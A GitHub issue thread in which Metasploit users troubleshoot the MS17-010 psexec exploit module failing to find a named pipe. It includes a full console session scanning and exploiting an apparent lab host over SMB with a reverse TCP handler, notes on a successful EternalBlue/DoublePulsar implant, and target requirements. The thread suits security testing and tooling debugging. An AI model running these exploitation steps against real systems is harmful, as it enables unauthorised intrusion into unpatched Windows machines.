Closed Cr0n1c closed 6 years ago
Shadowshusky
commented
6 years ago my moule always said “” /usr/share/metasploit-framework/modules/auxiliary/admin/smb/ms17_010_command.rb: NameError uninitialized constant Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010“ I don't konw why,could you help me to handle this issue?
Cr0n1c
commented
6 years ago mine did too, easiest thing to do is checkout the dev branch. It fixed my stuff. I then ran ```cp -R /root/git/metasploit-framework/ /real/path/to/metasploit-framework. That fixed the issues
busterb
commented
6 years ago Hmm, if you are getting access denied, does this mean that authentication via SMBUser/SMBPass is needed on the target? Can you say more about the target @Cr0n1c ?
Shadowshusky
commented
6 years ago emm...i still have some questions. you mean,git this metasploit framework to my kali,then run it? I move ms17_010_psexec.rb to /usr/share/metasploit-framework/mouldes/exploit/windows/smb,which is same path in this git.But it dosen't work,.....
bcoles
commented
6 years ago @Shadowshusky your issues aren't related detecting name pipes. See issue #9499
Shadowshusky
commented
6 years ago @bcoles thanks,i will try it.
dark8960
commented
6 years ago me too
Cr0n1c
commented
6 years ago Fuzzbunch
-> fuzzbunch-2018-02-08.11.31.26.989000.txt : Contains the order I ran the scripts.
-> smbtouch
-> Smbtouch-1.1.1.exe-2018-02-08.11.31.49.254000.txt: Text based results of the scan
-> smbtouch.pcap: Wireshark capture of the scan
-> namedpipetouch
-> Namedpipetouch-2.0.0.exe-2018-02-08.11.32.55.080000.txt: Text based results of the scan
-> namedpipetouch.pcap: Wireshark capture of the scan
-> eternalblue
-> Eternalblue-2.2.0.exe-2018-02-08.11.34.50.727000.txt: Text based results of exploit (it was already implanted, so it bailed)
-> Eternalblue-2.2.0.exe-2018-02-08.11.41.57.920000.txt: Text based results of exploit
-> eternalblue_fuzzbunch.pcap: Wireshark capture of the successful exploit (not the already sploited on)
-> doublepulsar
-> Doublepulsar-1.3.1.exe-2018-02-08.11.44.06.388000.txt: Text based results [proof of successful sploit]
Metasploit
===================================================
msf5 > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > set RHOSTS 10.11.1.73
RHOSTS => 10.11.1.73
msf5 auxiliary(scanner/smb/smb_version) > run
[+] 10.11.1.73:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:GAMMA) (workgroup:WORKGROUP )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/pipe_auditor
msf5 auxiliary(scanner/smb/pipe_auditor) > show options
Module options (auxiliary/scanner/smb/pipe_auditor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
msf5 auxiliary(scanner/smb/pipe_auditor) > set RHOSTS 10.11.1.73
RHOSTS => 10.11.1.73
msf5 auxiliary(scanner/smb/pipe_auditor) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/pipe_auditor) > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > set RHOST 10.11.1.73
RHOST => 10.11.1.73
msf5 exploit(windows/smb/ms17_010_psexec) > show options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
RHOST 10.11.1.73 yes The target address
RPORT 445 yes The Target port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/smb/ms17_010_psexec) > exploit
[*] Started reverse TCP handler on 10.11.0.70:4444
[*] 10.11.1.73:445 - Target OS: Windows 7 Professional 7601 Service Pack 1
[-] 10.11.1.73:445 - Unable to find accessible named pipe!
[*] Exploit completed, but no session was created.
===================================================
-> msf_smb_version_and_pipe_auditor.pcap: Wireshark capture of the scan.
-> msf_ms17_010_psexec.pcap: Wireshark capture of the failed exploit attempt.
CobaltStrike
-> 10.11.1.73_system_info.txt: ran systeminfo and dir on c:\ Target is a x86 Windows 7
10.11.1.73_system_info.txt Doublepulsar-1.3.1.exe-2018-02-08.11.43.12.308000.log Doublepulsar-1.3.1.exe-2018-02-08.11.44.06.388000.log Doublepulsar-1.3.1.exe-2018-02-08.11.44.27.420000.log Eternalblue-2.2.0.exe-2018-02-08.11.34.50.727000.log Eternalblue-2.2.0.exe-2018-02-08.11.41.57.920000.log fuzzbunch-2018-02-08.11.31.26.967000.log fuzzbunch-2018-02-08.11.31.26.989000.log Namedpipetouch-2.0.0.exe-2018-02-08.11.32.55.080000.log Smbtouch-1.1.1.exe-2018-02-08.11.31.49.254000.log Smbtouch-1.1.1.exe-2018-02-08.11.44.54.682000.log
Cr0n1c
commented
6 years ago Based on what I am seeing... the eternalblue exploit does not rely on needing a namedpipe. It looks like the other eternals need an authenticated pipe to work.
tkqasn
commented
6 years ago me too,i'm the same target
th1sm0r1
commented
6 years ago Have you solved the problem?@Cr0n1c
gearcapitan
commented
6 years ago namepipe on widnows 10 ???
Shadowshusky
commented
6 years ago To be able to use auxiliary/admin/smb/ms17_010_command: + +1. You can OPTIONALLY use a valid username/password to bypass most of these requirements. +2. The firewall must allow SMB traffic. +3. The target must use SMBv1. +4. The target must be missing the MS17-010 patch. +5. The target must allow anonymous IPC$ and a Named Pipe. + +You can check all of these with the SMB MS17-010 and Pipe Auditor auxiliary scanner modules.
I guess the problem may happen in namedpipe.maybe the target changed some options(such as some security standard,so we can't read the namedpipe.I guess if we have the password to login smb,maybe can success.
gearcapitan
commented
6 years ago @Shadowshusky Yes, but if I already have the password for what the fuck I want the exploit ms17 for that there is the exploit only psexec, because what you mention then makes this "exploit" useless because eternal blue if it works but eternal synergy with champions is very conflammatory, obio if or if the so is vulnerable when I do the virtual lab I make sure it is fulnerable and the exploit eternal blue works perfect but this noo osea wft? What's going on?
th1sm0r1
commented
6 years ago My side is all windows10 14393 There is no success.
kawaxi
commented
6 years ago on the same boat here.... works flawlessly on win 7 ultimate but wont in win 7 pro
xiaoxiaoleo
commented
6 years ago On the same boat too
busterb
commented
6 years ago You just need access to the IPC$ share, not a named pipe.
imanihb2007
commented
5 years ago Based on what I am seeing... the
eternalblueexploit does not rely on needing a namedpipe. It looks like the othereternalsneed an authenticated pipe to work.
Are you solved your problem?
Steps to reproduce
How'd you do it?
Throwing EternalBlue from here works.
When trying to use the new module, i have encountered 3 instances where Eternalblue worked but this module bail due to not finding a namedpipe.
Even when I specify the NAMEDPIPE it still is unable to find it. Looking at wireshark, I can see that it detects and gets an ACCESS DENIED.
If namedpipe is not detected, should it just use eternalblue? I do not see it using namedpipes in the actual exploit.
I installed Metasploit with:
OS
What OS are you running Metasploit on? Kali